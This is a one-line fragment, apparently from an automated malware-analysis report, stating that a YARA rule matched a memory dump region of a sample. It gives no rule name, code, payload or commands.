Source: Yara match	File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY